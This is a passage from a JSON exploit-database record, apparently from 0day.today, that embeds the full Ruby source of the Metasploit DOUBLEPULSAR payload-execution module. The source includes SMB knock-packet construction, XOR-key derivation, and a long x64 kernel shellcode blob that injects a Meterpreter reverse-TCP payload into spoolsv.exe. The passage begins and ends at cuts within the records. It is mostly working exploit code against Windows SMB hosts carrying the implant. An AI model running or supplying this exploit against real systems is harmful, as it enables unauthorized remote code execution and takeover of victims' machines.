\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:17:06", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f59c11fc510871a8e5ced50102f2a1a6", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T18:18:17", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T18:18:17", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T18:18:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T18:18:17", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "2bc5147a26be639f4873566c26445e1f", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", 